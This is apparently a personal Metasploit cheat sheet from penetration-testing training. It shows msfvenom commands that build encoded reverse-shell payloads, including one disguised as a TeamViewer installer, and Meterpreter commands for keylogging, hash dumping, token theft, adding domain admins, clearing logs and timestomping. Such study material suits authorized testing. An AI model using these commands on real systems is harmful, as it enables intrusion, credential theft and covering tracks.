sudo service postgresql status
sudo systemctl start postgresql
sudo msfdb init
sudo msfdb run
{% code title="Reinitiate the Database" %}
TCrypt@htb[/htb]$ msfdb reinit
TCrypt@htb[/htb]$ cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
TCrypt@htb[/htb]$ sudo service postgresql restart
TCrypt@htb[/htb]$ msfconsole -q
{% endcode %}
{% code title="Without Encoding" %}
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=4444 -b "\x00" -f perl
{% endcode %}
{% code title="With Encoding " %}
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe
{% endcode %}
workspace -a Target_1
## BACKGROUND SESSION >>> Allows search
meterpreter > bg
Background session 1? [y/N] y
exploit -j (background exploit) -> use Session ID
db_import Target.xml
db_nmap -sV -sS (target)
meterpreter > bg
Background session 1? [y/N] y
msf6 exploit(windows/iis/iis_webdav_upload_asp) > search local_exploit_suggester
git clone
ls Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
load pentest
___ _ _ ___ _ _
| _ \___ _ _| |_ ___ __| |_ | _ \ |_ _ __ _(_)_ _
| _/ -_) ' \ _/ -_|_-< _| | _/ | || / _` | | ' \
|_| \___|_||_\__\___/__/\__| |_| |_|\_,_\__, |_|_||_|
Version 1.6
Pentest Plugin loaded.
by Carlos Perez (carlos_perez[at]
[*] Successfully loaded plugin: pentest
msf6 > help
Tradecraft Commands
Command Description
------- -----------
check_footprint Checks the possible footprint of a post module on a target system.
auto_exploit Commands
Command Description
------- -----------
show_client_side Show matched client side exploits from data imported from vuln scanners.
vuln_exploit Runs exploits based on data imported from vuln scanners.
Discovery Commands
Command Description
------- -----------
discover_db Run discovery modules against current hosts in the database.
network_discover Performs a port-scan and enumeration of services found for non pivot networks.
pivot_network_discover Performs enumeration of networks available to a specified Meterpreter session.
show_session_networks Enumerate the networks one could pivot thru Meterpreter in the active sessions.
Project Commands
Command Description
------- -----------
project Command for managing projects.
Postauto Commands
Command Description
------- -----------
app_creds Run application password collection modules against specified sessions.
get_lhost List local IP addresses that can be used for LHOST.
multi_cmd Run shell command against several sessions
multi_meter_cmd Run a Meterpreter Console Command against specified sessions.
multi_meter_cmd_rc Run resource file with Meterpreter Console Commands against specified sessions.
multi_post Run a post module against specified sessions.
multi_post_rc Run resource file with post modules and options against specified sessions.
sys_creds Run system password collection modules against specified sessions.
Command | Description |
show exploits |
Show all exploits within the Framework. |
show payloads |
Show all payloads within the Framework. |
show auxiliary |
Show all auxiliary modules within the Framework. |
search <name> |
Search for exploits or modules within the Framework. |
info |
Load information about a specific exploit or module. |
use <name> |
Load an exploit or module (example: use windows/smb/psexec). |
use <number> |
Load an exploit by using the index number displayed after the search command. |
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells. |
The remote host or the target. set function Set a specific value (for example, LHOST or RHOST). |
setg <function> |
Set a specific value globally (for example, LHOST or RHOST). |
show options |
Show the options available for a module or exploit. |
show targets |
Show the platforms supported by the exploit. |
set target <number> |
Specify a specific target index if you know the OS and service pack. |
set payload <payload> |
Specify the payload to use. |
set payload <number> |
Specify the payload index number to use after the show payloads command. |
show advanced |
Show advanced options. |
set autorunscript migrate -f |
Automatically migrate to a separate process upon exploit completion. |
check |
Determine whether a target is vulnerable to an attack. |
exploit |
Execute the module or exploit and attack the target. |
exploit -j |
Run the exploit under the context of the job. (This will run the exploit in the background.) |
exploit -z |
Do not interact with the session after successful exploitation. |
exploit -e <encoder> |
Specify the payload encoder to use (example: exploit –e shikata_ga_nai). |
exploit -h |
Display help for the exploit command. |
sessions -l |
List available sessions (used when handling multiple shells). |
sessions -l -v |
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system. |
sessions -s <script> |
Run a specific Meterpreter script on all Meterpreter live sessions. |
sessions -K |
Kill all live sessions. |
sessions -c <cmd> |
Execute a command on all live Meterpreter sessions. |
sessions -u <sessionID> |
Upgrade a normal Win32 shell to a Meterpreter console. |
db_create <name> |
Create a database to use with database-driven attacks (example: db_create autopwn). |
db_connect <name> |
Create and connect to a database for driven attacks (example: db_connect autopwn). |
db_nmap |
Use Nmap and place results in a database. (Normal Nmap syntax is supported, such as –sT –v –P0.) |
db_destroy |
Delete the current database. |
db_destroy <user:password@host:port/database> |
Delete database using advanced options. |
Command | Description |
help |
Open Meterpreter usage help. |
run <scriptname> |
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory. |
sysinfo |
Show the system information on the compromised target. |
ls |
List the files and folders on the target. |
use priv |
Load the privilege extension for extended Meterpreter libraries. |
ps |
Show all running processes and which accounts are associated with each process. |
migrate <proc. id> |
Migrate to the specific process ID (PID is the target process ID gained from the ps command). |
use incognito |
Load incognito functions. (Used for token stealing and impersonation on a target machine.) |
list_tokens -u |
List available tokens on the target by user. |
list_tokens -g |
List available tokens on the target by group. |
impersonate_token <DOMAIN_NAMEUSERNAME> |
Impersonate a token available on the target. |
steal_token <proc. id> |
Steal the tokens available for a given process and impersonate that token. |
drop_token |
Stop impersonating the current token. |
getsystem |
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors. |
shell |
Drop into an interactive shell with all available tokens. |
execute -f <cmd.exe> -i |
Execute cmd.exe and interact with it. |
execute -f <cmd.exe> -i -t |
Execute cmd.exe with all available tokens. |
execute -f <cmd.exe> -i -H -t |
Execute cmd.exe with all available tokens and make it a hidden process. |
rev2self |
Revert back to the original user you used to compromise the target. |
reg <command> |
Interact, create, delete, query, set, and much more in the target’s registry. |
setdesktop <number> |
Switch to a different screen based on who is logged in. |
screenshot |
Take a screenshot of the target’s screen. |
upload <filename> |
Upload a file to the target. |
download <filename> |
Download a file from the target. |
keyscan_start |
Start sniffing keystrokes on the remote target. |
keyscan_dump |
Dump the remote keys captured on the target. |
keyscan_stop |
Stop sniffing keystrokes on the remote target. |
getprivs |
Get as many privileges as possible on the target. |
uictl enable <keyboard/mouse> |
Take control of the keyboard and/or mouse. |
background |
Run your current Meterpreter shell in the background. |
hashdump |
Dump all hashes on the target. use sniffer Load the sniffer module. |
sniffer_interfaces |
List the available interfaces on the target. |
sniffer_dump <interfaceID> pcapname |
Start sniffing on the remote target. |
sniffer_start <interfaceID> packet-buffer |
Start sniffing with a specific range for a packet buffer. |
sniffer_stats <interfaceID> |
Grab statistical information from the interface you are sniffing. |
sniffer_stop <interfaceID> |
Stop the sniffer. |
add_user <username> <password> -h <ip> |
Add a user on the remote target. |
add_group_user <"Domain Admins"> <username> -h <ip> |
Add a username to the Domain Administrators group on the remote target. |
clearev |
Clear the event log on the target machine. |
timestomp |
Change file attributes, such as creation date (antiforensics measure). |
reboot |
Reboot the target machine. |